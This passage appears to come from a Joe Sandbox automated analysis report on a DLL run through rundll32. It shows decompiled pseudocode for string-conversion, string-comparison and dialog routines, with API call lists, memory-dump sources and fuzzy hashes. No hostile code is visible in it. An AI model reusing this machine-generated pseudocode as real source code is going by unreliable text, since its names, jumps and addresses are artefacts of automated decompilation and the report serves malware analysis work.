                                                                                                            											}
                                                                                                            											goto L69;
                                                                                                            										}
                                                                                                            										__eflags = _t154 - _t159;
                                                                                                            										if(_t154 <= _t159) {
                                                                                                            											goto L17;
                                                                                                            										}
                                                                                                            										goto L36;
                                                                                                            									}
                                                                                                            									goto L69;
                                                                                                            								}
                                                                                                            								__eflags =  *(_t167 - 0x30) - _t141;
                                                                                                            								if( *(_t167 - 0x30) < _t141) {
                                                                                                            									goto L20;
                                                                                                            								}
                                                                                                            								_t133 = _t167 - 0x2a;
                                                                                                            								__eflags =  *((char*)(_t167 - 0x2a));
                                                                                                            								if( *((char*)(_t167 - 0x2a)) == 0) {
                                                                                                            									goto L20;
                                                                                                            								} else {
                                                                                                            									goto L25;
                                                                                                            								}
                                                                                                            								while(1) {
                                                                                                            									L25:
                                                                                                            									_t160 =  *((intOrPtr*)(_t133 + 1));
                                                                                                            									__eflags = _t160;
                                                                                                            									if(_t160 == 0) {
                                                                                                            										goto L20;
                                                                                                            									}
                                                                                                            									_t156 =  *( *(_t167 + 0x10));
                                                                                                            									__eflags = _t156 -  *_t133;
                                                                                                            									if(_t156 <  *_t133) {
                                                                                                            										L28:
                                                                                                            										_t133 = _t133 + _t141;
                                                                                                            										__eflags =  *_t133;
                                                                                                            										if( *_t133 != 0) {
                                                                                                            											continue;
                                                                                                            										}
                                                                                                            										goto L20;
                                                                                                            									}
                                                                                                            									__eflags = _t156 - _t160;
                                                                                                            									if(_t156 <= _t160) {
                                                                                                            										goto L17;
                                                                                                            									}
                                                                                                            									goto L28;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L20:
                                                                                                            							_t98 = 3;
                                                                                                            							goto L70;
                                                                                                            						}
                                                                                                            						L17:
                                                                                                            						_t98 = _t141;
                                                                                                            						goto L70;
                                                                                                            					} else {
                                                                                                            						L38:
                                                                                                            						_t143 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x10),  *(_t167 + 0x14), _t162, _t162);
                                                                                                            						 *(_t167 - 0x48) = _t143;
                                                                                                            						__eflags = _t143 - _t162;
                                                                                                            						if(_t143 == _t162) {
                                                                                                            							goto L61;
                                                                                                            						}
                                                                                                            						 *(_t167 - 4) = _t162;
                                                                                                            						E10010B20(_t143 + _t143 + 0x00000003 & 0xfffffffc, _t144);
                                                                                                            						 *(_t167 - 0x18) = _t168;
                                                                                                            						 *(_t167 - 0x34) = _t168;
                                                                                                            						 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
                                                                                                            						_t118 =  *(_t167 - 0x34);
                                                                                                            						__eflags = _t118 - _t162;
                                                                                                            						if(_t118 != _t162) {
                                                                                                            							L43:
                                                                                                            							_t119 = MultiByteToWideChar( *(_t167 + 0x20), _t165,  *(_t167 + 0x10),  *(_t167 + 0x14), _t118, _t143);
                                                                                                            							__eflags = _t119;
                                                                                                            							if(_t119 == 0) {
                                                                                                            								L53:
                                                                                                            								__eflags =  *(_t167 - 0x3c);
                                                                                                            								if(__eflags != 0) {
                                                                                                            									_push( *(_t167 - 0x34));
                                                                                                            									E100107C8(_t143, _t162, _t165, __eflags);
                                                                                                            								}
                                                                                                            								_t98 =  *(_t167 - 0x40);
                                                                                                            								goto L70;
                                                                                                            							}
                                                                                                            							_t165 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x18),  *(_t167 + 0x1c), 0, 0);
                                                                                                            							 *(_t167 - 0x4c) = _t165;
                                                                                                            							__eflags = _t165;
                                                                                                            							if(_t165 == 0) {
                                                                                                            								goto L53;
                                                                                                            							}
                                                                                                            							 *(_t167 - 4) = 1;
                                                                                                            							E10010B20(_t165 + _t165 + 0x00000003 & 0xfffffffc, _t144);
                                                                                                            							 *(_t167 - 0x18) = _t168;
                                                                                                            							_t162 = _t168;
                                                                                                            							 *(_t167 - 0x50) = _t162;
                                                                                                            							 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
                                                                                                            							__eflags = _t162;
                                                                                                            							if(_t162 != 0) {
                                                                                                            								L49:
                                                                                                            								_t126 = MultiByteToWideChar( *(_t167 + 0x20), 1,  *(_t167 + 0x18),  *(_t167 + 0x1c), _t162, _t165);
                                                                                                            								__eflags = _t126;
                                                                                                            								if(_t126 != 0) {
                                                                                                            									 *(_t167 - 0x40) = CompareStringW( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 - 0x34), _t143, _t162, _t165);
                                                                                                            								}
                                                                                                            								__eflags =  *(_t167 - 0x44);
                                                                                                            								if(__eflags != 0) {
                                                                                                            									_push(_t162);
                                                                                                            									E100107C8(_t143, _t162, _t165, __eflags);
                                                                                                            								}
                                                                                                            								goto L53;
                                                                                                            							} else {
                                                                                                            								_t162 = E100107B6(_t165 + _t165);
                                                                                                            								__eflags = _t162;
                                                                                                            								if(_t162 == 0) {
                                                                                                            									goto L53;
                                                                                                            								}
                                                                                                            								 *(_t167 - 0x44) = 1;
                                                                                                            								goto L49;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t118 = E100107B6(_t143 + _t143);
                                                                                                            							_pop(_t144);
                                                                                                            							 *(_t167 - 0x34) = _t118;
                                                                                                            							__eflags = _t118 - _t162;
                                                                                                            							if(_t118 == _t162) {
                                                                                                            								goto L61;
                                                                                                            							}
                                                                                                            							 *(_t167 - 0x3c) = _t165;
                                                                                                            							goto L43;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}





























                                                                                                            0x1001c747
                                                                                                            0x1001c74f
                                                                                                            0x1001c752
                                                                                                            0x1001c754
                                                                                                            0x1001c75f
                                                                                                            0x1001c765
                                                                                                            0x00000000
                                                                                                            0x1001c765
                                                                                                            0x1001c756
                                                                                                            0x1001c757
                                                                                                            0x1001c75c
                                                                                                            0x00000000
                                                                                                            0x1001c4b9
                                                                                                            0x1001c4bb
                                                                                                            0x1001c717
                                                                                                            0x1001c717
                                                                                                            0x1001c798
                                                                                                            0x1001c7a8
                                                                                                            0x1001c7a8
                                                                                                            0x1001c4c1
                                                                                                            0x1001c4c4
                                                                                                            0x1001c4c7
                                                                                                            0x1001c4cd
                                                                                                            0x1001c4cf
                                                                                                            0x1001c4d5
                                                                                                            0x1001c4d5
                                                                                                            0x1001c4db
                                                                                                            0x1001c4e8
                                                                                                            0x1001c4f1
                                                                                                            0x1001c4f3
                                                                                                            0x1001c796
                                                                                                            0x1001c796
                                                                                                            0x00000000
                                                                                                            0x1001c796
                                                                                                            0x1001c4f9
                                                                                                            0x1001c4fc
                                                                                                            0x1001c50d
                                                                                                            0x1001c513
                                                                                                            0x1001c515
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c51b
                                                                                                            0x1001c51e
                                                                                                            0x1001c54b
                                                                                                            0x1001c54e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c550
                                                                                                            0x1001c553
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c559
                                                                                                            0x1001c55c
                                                                                                            0x1001c560
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c566
                                                                                                            0x1001c566
                                                                                                            0x1001c566
                                                                                                            0x1001c569
                                                                                                            0x1001c56b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c574
                                                                                                            0x1001c576
                                                                                                            0x1001c578
                                                                                                            0x1001c582
                                                                                                            0x1001c582
                                                                                                            0x1001c584
                                                                                                            0x1001c587
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c589
                                                                                                            0x1001c57a
                                                                                                            0x1001c57c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c57c
                                                                                                            0x00000000
                                                                                                            0x1001c566
                                                                                                            0x1001c520
                                                                                                            0x1001c523
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c525
                                                                                                            0x1001c528
                                                                                                            0x1001c52c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c52e
                                                                                                            0x1001c52e
                                                                                                            0x1001c52e
                                                                                                            0x1001c531
                                                                                                            0x1001c533
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c538
                                                                                                            0x1001c53a
                                                                                                            0x1001c53c
                                                                                                            0x1001c542
                                                                                                            0x1001c542
                                                                                                            0x1001c544
                                                                                                            0x1001c547
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c549
                                                                                                            0x1001c53e
                                                                                                            0x1001c540
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c540
                                                                                                            0x1001c52e
                                                                                                            0x1001c4fe
                                                                                                            0x1001c500
                                                                                                            0x00000000
                                                                                                            0x1001c500
                                                                                                            0x1001c4ea
                                                                                                            0x1001c4ea
                                                                                                            0x00000000
                                                                                                            0x1001c58e
                                                                                                            0x1001c58e
                                                                                                            0x1001c5a1
                                                                                                            0x1001c5a3
                                                                                                            0x1001c5a6
                                                                                                            0x1001c5a8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c5ae
                                                                                                            0x1001c5ba
                                                                                                            0x1001c5bf
                                                                                                            0x1001c5c4
                                                                                                            0x1001c5c7
                                                                                                            0x1001c5e9
                                                                                                            0x1001c5ec
                                                                                                            0x1001c5ee
                                                                                                            0x1001c608
                                                                                                            0x1001c614
                                                                                                            0x1001c61a
                                                                                                            0x1001c61c
                                                                                                            0x1001c6d3
                                                                                                            0x1001c6d3
                                                                                                            0x1001c6d7
                                                                                                            0x1001c6d9
                                                                                                            0x1001c6dc
                                                                                                            0x1001c6e1
                                                                                                            0x1001c6e2
                                                                                                            0x00000000
                                                                                                            0x1001c6e2
                                                                                                            0x1001c637
                                                                                                            0x1001c639
                                                                                                            0x1001c63c
                                                                                                            0x1001c63e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c644
                                                                                                            0x1001c654
                                                                                                            0x1001c659
                                                                                                            0x1001c65c
                                                                                                            0x1001c65e
                                                                                                            0x1001c661
                                                                                                            0x1001c67f
                                                                                                            0x1001c681
                                                                                                            0x1001c69a
                                                                                                            0x1001c6a7
                                                                                                            0x1001c6ad
                                                                                                            0x1001c6af
                                                                                                            0x1001c6c3
                                                                                                            0x1001c6c3
                                                                                                            0x1001c6c6
                                                                                                            0x1001c6ca
                                                                                                            0x1001c6cc
                                                                                                            0x1001c6cd
                                                                                                            0x1001c6d2
                                                                                                            0x00000000
                                                                                                            0x1001c683
                                                                                                            0x1001c68d
                                                                                                            0x1001c68f
                                                                                                            0x1001c691
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c693
                                                                                                            0x00000000
                                                                                                            0x1001c693
                                                                                                            0x1001c5f0
                                                                                                            0x1001c5f4
                                                                                                            0x1001c5f9
                                                                                                            0x1001c5fa
                                                                                                            0x1001c5fd
                                                                                                            0x1001c5ff
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c605
                                                                                                            0x00000000
                                                                                                            0x1001c605
                                                                                                            0x1001c5ee
                                                                                                            0x1001c4db

                                                                                                            APIs
                                                                                                            • CompareStringW.KERNEL32(00000000,00000000,10042704,00000001,10042704,00000001,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?), ref: 1001C451
                                                                                                            • GetLastError.KERNEL32(?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC,10042CD0,00000018,10019429,10042CE0,00000008,10013474), ref: 1001C463
                                                                                                            • GetCPInfo.KERNEL32(00000000,00000000,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?,?,1001AE49,00000000,00000000), ref: 1001C50D
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C59B
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C614
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,100101C3,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C631
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,100101C3,?,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C6A7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1773772771-4125583295
                                                                                                            • Opcode ID: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
                                                                                                            • Instruction ID: f9a15a39c5567b5c4af314f3663c8d3c96b15f003a3eabc65cf21064ebdc607f
                                                                                                            • Opcode Fuzzy Hash: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
                                                                                                            • Instruction Fuzzy Hash: DCB1897690825EAFDF22CFA4DC95EAE7BF6EF05690F200119F840AA1A1D771D9D0CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 92%
                                                                                                            			E1001F2DE(intOrPtr* __ecx) {
                                                                                                            				signed int _t45;
                                                                                                            				void* _t49;
                                                                                                            				CHAR* _t50;
                                                                                                            				signed int _t54;
                                                                                                            				signed char _t60;
                                                                                                            				struct HWND__* _t62;
                                                                                                            				CHAR* _t63;
                                                                                                            				signed int _t68;
                                                                                                            				struct HINSTANCE__* _t81;
                                                                                                            				void* _t83;
                                                                                                            				intOrPtr* _t85;
                                                                                                            				void* _t87;
                                                                                                            				void* _t89;
                                                                                                            
                                                                                                            				E10011BF0(0x1003a3e8, _t87);
                                                                                                            				_t85 = __ecx;
                                                                                                            				_t68 =  *(__ecx + 0x5c);
                                                                                                            				 *((intOrPtr*)(_t87 - 0x10)) = _t89 - 0x18;
                                                                                                            				 *((intOrPtr*)(_t87 - 0x1c)) = __ecx;
                                                                                                            				 *(_t87 - 0x18) =  *(__ecx + 0x58);
                                                                                                            				_t45 = E100373B5();
                                                                                                            				_t81 =  *(_t45 + 0xc);
                                                                                                            				if( *(_t85 + 0x54) != 0) {
                                                                                                            					_t81 =  *(E100373B5() + 0xc);
                                                                                                            					_t45 = LoadResource(_t81, FindResourceA(_t81,  *(_t85 + 0x54), 5));
                                                                                                            					 *(_t87 - 0x18) = _t45;
                                                                                                            				}
                                                                                                            				if( *(_t87 - 0x18) != 0) {
                                                                                                            					_t45 = LockResource( *(_t87 - 0x18));
                                                                                                            					_t68 = _t45;
                                                                                                            				}
                                                                                                            				if(_t68 != 0) {
                                                                                                            					 *(_t87 - 0x14) = E1001EE1E(_t85);
                                                                                                            					E10022196();
                                                                                                            					 *(_t87 - 0x20) =  *(_t87 - 0x20) & 0x00000000;
                                                                                                            					__eflags =  *(_t87 - 0x14);
                                                                                                            					if( *(_t87 - 0x14) != 0) {
                                                                                                            						_t62 = GetDesktopWindow();
                                                                                                            						__eflags =  *(_t87 - 0x14) - _t62;
                                                                                                            						if( *(_t87 - 0x14) != _t62) {
                                                                                                            							_t63 = IsWindowEnabled( *(_t87 - 0x14));
                                                                                                            							__eflags = _t63;
                                                                                                            							if(_t63 != 0) {
                                                                                                            								EnableWindow( *(_t87 - 0x14), 0);
                                                                                                            								 *(_t87 - 0x20) = 1;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
                                                                                                            					_push(_t85);
                                                                                                            					E100237EE();
                                                                                                            					_t49 = E100220EE(_t87,  *(_t87 - 0x14));
                                                                                                            					_push(_t81);
                                                                                                            					_push(_t49);
                                                                                                            					_push(_t68);
                                                                                                            					_t50 = E1001F0D1(_t85);
                                                                                                            					__eflags = _t50;
                                                                                                            					if(_t50 != 0) {
                                                                                                            						__eflags =  *(_t85 + 0x38) & 0x00000010;
                                                                                                            						if(( *(_t85 + 0x38) & 0x00000010) != 0) {
                                                                                                            							_t83 = 4;
                                                                                                            							_t60 = E100202AB(_t85);
                                                                                                            							__eflags = _t60 & 0x00000001;
                                                                                                            							if((_t60 & 0x00000001) != 0) {
                                                                                                            								_t83 = 5;
                                                                                                            							}
                                                                                                            							E10021B92(_t85, _t83);
                                                                                                            						}
                                                                                                            						__eflags =  *(_t85 + 0x1c);
                                                                                                            						if( *(_t85 + 0x1c) != 0) {
                                                                                                            							E100204FE(_t85, 0, 0, 0, 0, 0, 0x97);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
                                                                                                            					__eflags =  *(_t87 - 0x20);
                                                                                                            					if( *(_t87 - 0x20) != 0) {
                                                                                                            						EnableWindow( *(_t87 - 0x14), 1);
                                                                                                            					}
                                                                                                            					__eflags =  *(_t87 - 0x14);
                                                                                                            					if(__eflags != 0) {
                                                                                                            						__eflags = GetActiveWindow() -  *(_t85 + 0x1c);
                                                                                                            						if(__eflags == 0) {
                                                                                                            							SetActiveWindow( *(_t87 - 0x14));
                                                                                                            						}
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)( *_t85 + 0x60))();
                                                                                                            					E1001EE58(_t85, __eflags);
                                                                                                            					__eflags =  *(_t85 + 0x54);
                                                                                                            					if( *(_t85 + 0x54) != 0) {
                                                                                                            						FreeResource( *(_t87 - 0x18));
                                                                                                            					}
                                                                                                            					_t54 =  *(_t85 + 0x40);
                                                                                                            				} else {
                                                                                                            					_t54 = _t45 | 0xffffffff;
                                                                                                            				}
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
                                                                                                            				return _t54;
                                                                                                            			}

















                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1001F2E3
                                                                                                            • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F31B
                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F323
                                                                                                              • Part of subcall function 10022196: UnhookWindowsHookEx.USER32(?), ref: 100221BB
                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F335
                                                                                                            • GetDesktopWindow.USER32 ref: 1001F362
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 1001F370
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 1001F37F
                                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 1001F40E
                                                                                                            • GetActiveWindow.USER32 ref: 1001F419
                                                                                                            • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F427
                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F443
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 833315621-0
                                                                                                            • Opcode ID: 36a7553cafaefb879fb01c6852922989da2301ce548023a2a0f367a123b38a93
                                                                                                            • Instruction ID: 07bae71fa05b1da8482edcdebb19160d7d4844d0efed804ca524429d20d1f7a4
                                                                                                            • Opcode Fuzzy Hash: 36a7553cafaefb879fb01c6852922989da2301ce548023a2a0f367a123b38a93
                                                                                                            • Instruction Fuzzy Hash: D14190359007199FDB12DFA5C889BBEB7F5FF14751F10011DF102AA1A2CB74AA81CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E1001A487(void* __ebx, void* __edi, int __esi, void* __eflags) {
                                                                                                            				intOrPtr _t54;
                                                                                                            				int _t56;
                                                                                                            				char* _t57;
                                                                                                            				int _t68;
                                                                                                            				char* _t69;
                                                                                                            				int _t70;
                                                                                                            				int _t73;
                                                                                                            				void* _t77;
                                                                                                            				int _t81;
                                                                                                            				short* _t82;
                                                                                                            				void* _t97;
                                                                                                            				short* _t98;
                                                                                                            
                                                                                                            				_t94 = __esi;
                                                                                                            				_push(0x38);
                                                                                                            				_push(0x10042f10);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				_t54 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				 *((intOrPtr*)(_t97 - 0x1c)) = _t54;
                                                                                                            				 *(_t97 - 0x34) = 0;
                                                                                                            				 *(_t97 - 0x44) = 0;
                                                                                                            				_t81 =  *( *(_t97 + 0x14));
                                                                                                            				 *(_t97 - 0x40) = _t81;
                                                                                                            				 *(_t97 - 0x3c) = 0;
                                                                                                            				_t56 =  *(_t97 + 8);
                                                                                                            				if(_t56 ==  *(_t97 + 0xc)) {
                                                                                                            					_t82 =  *(_t97 - 0x48);
                                                                                                            					goto L31;
                                                                                                            				} else {
                                                                                                            					_t85 = _t97 - 0x30;
                                                                                                            					if(GetCPInfo(_t56, _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1 && GetCPInfo( *(_t97 + 0xc), _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1) {
                                                                                                            						 *(_t97 - 0x3c) = 1;
                                                                                                            					}
                                                                                                            					if( *(_t97 - 0x3c) == 0) {
                                                                                                            						_t94 =  *(_t97 - 0x38);
                                                                                                            					} else {
                                                                                                            						if(_t81 == 0xffffffff) {
                                                                                                            							_t77 = E10011820( *(_t97 + 0x10));
                                                                                                            							_pop(_t85);
                                                                                                            							_t94 = _t77 + 1;
                                                                                                            							__eflags = _t94;
                                                                                                            						} else {
                                                                                                            							_t94 = _t81;
                                                                                                            						}
                                                                                                            						 *(_t97 - 0x38) = _t94;
                                                                                                            					}
                                                                                                            					if( *(_t97 - 0x3c) != 0) {
                                                                                                            						L14:
                                                                                                            						 *(_t97 - 4) = 0;
                                                                                                            						E10010B20(_t94 + _t94 + 0x00000003 & 0xfffffffc, _t85);
                                                                                                            						 *(_t97 - 0x18) = _t98;
                                                                                                            						_t82 = _t98;
                                                                                                            						 *(_t97 - 0x48) = _t82;
                                                                                                            						E10011C50(_t82, 0, _t94 + _t94);
                                                                                                            						 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
                                                                                                            						_t111 = _t82;
                                                                                                            						if(_t82 != 0) {
                                                                                                            							L19:
                                                                                                            							_t68 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10),  *(_t97 - 0x40), _t82, _t94);
                                                                                                            							__eflags = _t68;
                                                                                                            							if(_t68 == 0) {
                                                                                                            								L31:
                                                                                                            								__eflags =  *(_t97 - 0x44);
                                                                                                            								if(__eflags != 0) {
                                                                                                            									_push(_t82);
                                                                                                            									E100107C8(_t82, 0, _t94, __eflags);
                                                                                                            								}
                                                                                                            								_t57 =  *(_t97 - 0x34);
                                                                                                            								goto L34;
                                                                                                            							}
                                                                                                            							__eflags =  *(_t97 + 0x18);
                                                                                                            							if( *(_t97 + 0x18) == 0) {
                                                                                                            								__eflags =  *(_t97 - 0x3c);
                                                                                                            								if(__eflags != 0) {
                                                                                                            									L25:
                                                                                                            									_push(_t94);
                                                                                                            									_push(1);
                                                                                                            									_t69 = E1001382A(_t82, 0, _t94, __eflags);
                                                                                                            									 *(_t97 - 0x34) = _t69;
                                                                                                            									__eflags = _t69;
                                                                                                            									if(_t69 != 0) {
                                                                                                            										_t70 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, _t69, _t94, 0, 0);
                                                                                                            										__eflags = _t70;
                                                                                                            										if(__eflags != 0) {
                                                                                                            											__eflags =  *(_t97 - 0x40) - 0xffffffff;
                                                                                                            											if( *(_t97 - 0x40) != 0xffffffff) {
                                                                                                            												 *( *(_t97 + 0x14)) = _t70;
                                                                                                            											}
                                                                                                            										} else {
                                                                                                            											_push( *(_t97 - 0x34));
                                                                                                            											E100107C8(_t82, 0, _t94, __eflags);
                                                                                                            											 *(_t97 - 0x34) = 0;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									goto L31;
                                                                                                            								}
                                                                                                            								_t94 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, 0, 0, 0, 0);
                                                                                                            								__eflags = _t94;
                                                                                                            								if(__eflags == 0) {
                                                                                                            									goto L31;
                                                                                                            								}
                                                                                                            								goto L25;
                                                                                                            							}
                                                                                                            							_t73 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94,  *(_t97 + 0x18),  *(_t97 + 0x1c), 0, 0);
                                                                                                            							__eflags = _t73;
                                                                                                            							if(_t73 != 0) {
                                                                                                            								 *(_t97 - 0x34) =  *(_t97 + 0x18);
                                                                                                            							}
                                                                                                            							goto L31;
                                                                                                            						} else {
                                                                                                            							_push(_t94);
                                                                                                            							_push(2);
                                                                                                            							_t82 = E1001382A(_t82, 0, _t94, _t111);
                                                                                                            							if(_t82 != 0) {
                                                                                                            								 *(_t97 - 0x44) = 1;
                                                                                                            								goto L19;
                                                                                                            							}
                                                                                                            							goto L17;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t94 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10), _t81, 0, 0);
                                                                                                            						 *(_t97 - 0x38) = _t94;
                                                                                                            						if(_t94 == 0) {
                                                                                                            							L17:
                                                                                                            							_t57 = 0;
                                                                                                            							L34:
                                                                                                            							return E1001254F(E100117AE(_t57,  *((intOrPtr*)(_t97 - 0x1c))));
                                                                                                            						}
                                                                                                            						goto L14;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}
















                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(00000000,?,10042F10,00000038,100185C0,?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020), ref: 1001A4C5
                                                                                                            • GetCPInfo.KERNEL32(00000000,00000001), ref: 1001A4D8
                                                                                                            • _strlen.LIBCMT ref: 1001A4FC
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,10012C1E,?,00000000,00000000), ref: 1001A51D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Info$ByteCharMultiWide_strlen
                                                                                                            • String ID: @hvpYv
                                                                                                            • API String ID: 1335377746-2766943729
                                                                                                            • Opcode ID: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
                                                                                                            • Instruction ID: 70101fa7554b3a37292e61141452f95f373fba0d19c42cfe0f4ebf6b77a3f96e
                                                                                                            • Opcode Fuzzy Hash: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
                                                                                                            • Instruction Fuzzy Hash: 99514671900619ABDF21CFA5DC84D9EBBF9FF867A0B24411AF814AA190D7309DC1CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 98%
                                                                                                            			E1001666B() {
                                                                                                            				int _v4;
                                                                                                            				int _v8;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
